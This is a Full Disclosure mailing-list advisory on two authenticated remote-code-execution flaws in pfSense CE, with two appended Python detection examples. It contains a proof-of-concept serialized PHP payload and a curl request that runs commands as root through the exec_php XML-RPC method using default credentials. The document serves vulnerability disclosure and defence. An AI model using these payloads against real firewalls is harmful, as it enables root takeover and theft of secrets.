[Full Disclosure] CVE-2025-69690 & CVE-2025-69691 — Authenticated RCE in Netgate pfSense CE 2.7.2 and 2.8.0


Full Disclosure mailing list archives


From: privexploits via Fulldisclosure <fulldisclosure () seclists org>
Date: Mon, 16 Feb 2026 14:09:25 +0000

Advisory: Authenticated Remote Code Execution in pfSense CE
CVEs: CVE-2025-69690, CVE-2025-69691
Researcher: Nelson Adhepeau (privexploits () protonmail com)
Date: February 2026


== RESPONSIBLE DISCLOSURE NOTICE ==

This advisory is published in accordance with responsible disclosure practices. 

The vendor was notified on December 2, 2025, acknowledged the reports, and indicated no patches would be issued. 
Publication follows standard 90-day disclosure guidelines.

-------------------------------------------------------------

== OVERVIEW ==

Two independent authenticated Remote Code Execution
vulnerabilities were discovered in Netgate pfSense Community
Edition. Both were reproduced on clean installations. Vendor
was contacted and acknowledged the reports but classified both
as expected behavior for authenticated administrators.

-------------------------------------------------------------

== CVE-2025-69690 ==
Authenticated RCE via Unsafe Deserialization (pfSense CE 2.7.2)

CVSS v3.1: 8.8 (High)
Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE-502: Deserialization of Untrusted Data
CWE-915: Improperly Controlled Dynamic Code Evaluation

-- Description --

The pfSense configuration restore mechanism invokes
unserialize() on user-controlled data without class
whitelisting, input validation, or sandboxing.

A crafted backup file containing a malicious serialized PHP
object can inject arbitrary commands via the
post_reboot_commands property, executed through mwexec()
with full root privileges.

-- Affected Component --

backup/restore mechanism, config.php,
pfsense_module_installer class, unserialize() handling

-- Attack Vector --

1. Attacker authenticates as administrator
2. Uploads malicious configuration backup file
3. Triggers restore operation
4. pfSense unserializes attacker-controlled data
5. Commands execute as root via mwexec()

-- PoC Payload --

O:23:"pfsense_module_installer":1:{
  s:17:"*post_reboot_commands";
  a:1:{i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";}}

-- Impact --

- Arbitrary command execution as root
- Persistent compromise
- Complete firewall takeover
- Credential and configuration exfiltration

-- Vendor Response --

Netgate acknowledged the report. Classified as
"authenticated administrative abuse". No patch issued.
Vendor does not assign CVEs directly.

-------------------------------------------------------------

== CVE-2025-69691 ==
Authenticated RCE via XMLRPC exec_php (pfSense CE 2.8.0)

CVSS v3.1: 9.9 (Critical)
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-284: Improper Access Control
CWE-915: Improperly Controlled Dynamic Code Evaluation

-- Description --

pfSense CE 2.8.0 exposes an XMLRPC API method
pfsense.exec_php that executes arbitrary PHP code as root
without validation, sandboxing, or restrictions.

The endpoint is enabled by default, accessible over HTTPS
via Basic Authentication, and executes supplied code
immediately with full system privileges. Default credentials
(admin:pfsense) are widely deployed, significantly lowering
the exploitation barrier.

-- Affected Component --

xmlrpc.php, pfsense.exec_php method, XMLRPC API handler,
BasicAuth authentication layer

-- Attack Vector --

curl -k -u admin:pfsense \
  -d '<methodCall>
    <methodName>pfsense.exec_php</methodName>
    <params><param><value><string>
      system("id");
    </string></value></param></params>
  </methodCall>' \
  https://<target>/xmlrpc.php

-- Impact --

- Full remote root compromise
- Arbitrary file read/write
- Backdoor deployment
- Firewall rule manipulation
- Extraction of secrets and configurations

-- Vendor Response --

Netgate acknowledged the report. Classified as expected
behavior for authenticated users. No patch in pfSense CE
2.8.0. Still exploitable as of latest version at time
of disclosure.

-------------------------------------------------------------

== TIMELINE ==

- November 2025: Vulnerabilities discovered
- December 2, 2025: Initial report sent to Netgate
- Netgate acknowledged, no patch planned
- January 28, 2026: CVEs assigned by MITRE
- February 2026: Public disclosure

-------------------------------------------------------------

== REFERENCES ==

CVE-2025-69690:
https://cve.org/CVERecord?id=CVE-2025-69690

CVE-2025-69691:
https://cve.org/CVERecord?id=CVE-2025-69691

Researcher:
https://github.com/privlabs
https://linkedin.com/in/nelson-adhepeau

-------------------------------------------------------------
Nelson Adhepeau
Independent Security Researcher
privexploits () protonmail com


Sent with Proton Mail secure email.

Attachment: signature.asc
Description: OpenPGP digital signature
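
Added example, not part of the original advisory and not Netgate code: a pre-restore screen for the CVE-2025-69690 path, which refuses any backup file that carries a PHP serialized-object header, either in the clear or under up to two layers of base64. The function names, the base64 handling and the sample documents are assumptions made for illustration; where such an object would sit inside a real backup is not stated in the advisory.

```python
import base64
import re

# PHP serialize() object headers: O:<len>:"<class>":<count>:{ and C:<len>:"<class>":<bytes>:{
OBJECT_TOKEN = re.compile(rb'\b[OC]:\d+:"([^"\x00]{1,128})":\d+:\{')
# Base64 runs long enough to hide a serialized blob inside an XML text node.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")
MAX_LAYERS = 2  # how many nested base64 layers to peel before giving up


def find_php_objects(data: bytes, layer: int = 0):
    """Return [(class_name, base64_layer)] for each serialized-object header found."""
    hits = [(m.group(1).decode("latin-1"), layer) for m in OBJECT_TOKEN.finditer(data)]
    if layer < MAX_LAYERS:
        for run in B64_RUN.finditer(data):
            try:
                decoded = base64.b64decode(run.group(0), validate=True)
            except ValueError:
                continue  # not valid base64, e.g. a hash or an identifier
            hits.extend(find_php_objects(decoded, layer + 1))
    return hits


def safe_to_restore(data: bytes) -> bool:
    """A backup is passed on for restore only when no object header is present."""
    return not find_php_objects(data)


# Constructed samples (not real pfSense backups); the element names are made up.
CLEAN = b"<pfsense><system><hostname>fw1</hostname></system></pfsense>"
TAINTED = (b'<pfsense><note>O:23:"pfsense_module_installer":1:'
           b'{s:4:"note";s:2:"hi";}</note></pfsense>')
ENCODED = b"<pfsense><blob>" + base64.b64encode(b'O:8:"stdClass":0:{}') + b"</blob></pfsense>"

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("tainted", TAINTED), ("encoded", ENCODED)):
        print(name, safe_to_restore(sample), find_php_objects(sample))
```

A hit is a reason to inspect the file by hand before restoring it, not proof of tampering.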

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
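
Added example, not part of the original advisory and not Netgate code: detection logic for the CVE-2025-69691 path that triages one recorded POST to xmlrpc.php and flags a pfsense.exec_php call and use of the default admin:pfsense pair. It assumes the request path, Authorization header and body are available to the defender (for example from a TLS-terminating proxy); the function names and the sample record are hypothetical.

```python
import base64
import xml.etree.ElementTree as ET

CODE_EXEC_METHODS = {"pfsense.exec_php"}  # method named in the advisory
DEFAULT_CREDS = "admin:pfsense"           # default pair named in the advisory


def xmlrpc_method(body: bytes):
    """Return the methodName of an XML-RPC call, or None if it cannot be parsed."""
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return None  # XML-RPC needs no DTD, so never hand one to the parser
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    name = root.findtext("methodName") if root.tag == "methodCall" else None
    return name.strip() if name else None


def basic_auth_pair(header_value: str):
    """Decode an HTTP Basic Authorization header to 'user:password', or None."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        return base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


def triage(path: str, authorization: str, body: bytes):
    """Return findings for one recorded POST (path, Authorization header, body)."""
    if not path.split("?", 1)[0].endswith("/xmlrpc.php"):
        return []
    findings = []
    method = xmlrpc_method(body)
    if method is None:
        findings.append("unparseable-body")
    elif method in CODE_EXEC_METHODS:
        findings.append("code-exec-method:" + method)
    if basic_auth_pair(authorization) == DEFAULT_CREDS:
        findings.append("default-credentials")
    return findings


# Constructed record; the PHP string is a harmless placeholder.
SAMPLE_AUTH = "Basic " + base64.b64encode(b"admin:pfsense").decode()
SAMPLE_BODY = (b"<methodCall><methodName>pfsense.exec_php</methodName><params><param>"
               b"<value><string>/* omitted */</string></value></param></params></methodCall>")
```

Bodies that carry a DTD or fail to parse are reported rather than silently skipped, so a malformed request cannot slip past the check.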

Source: https://seclists.org/fulldisclosure/2026/Feb/16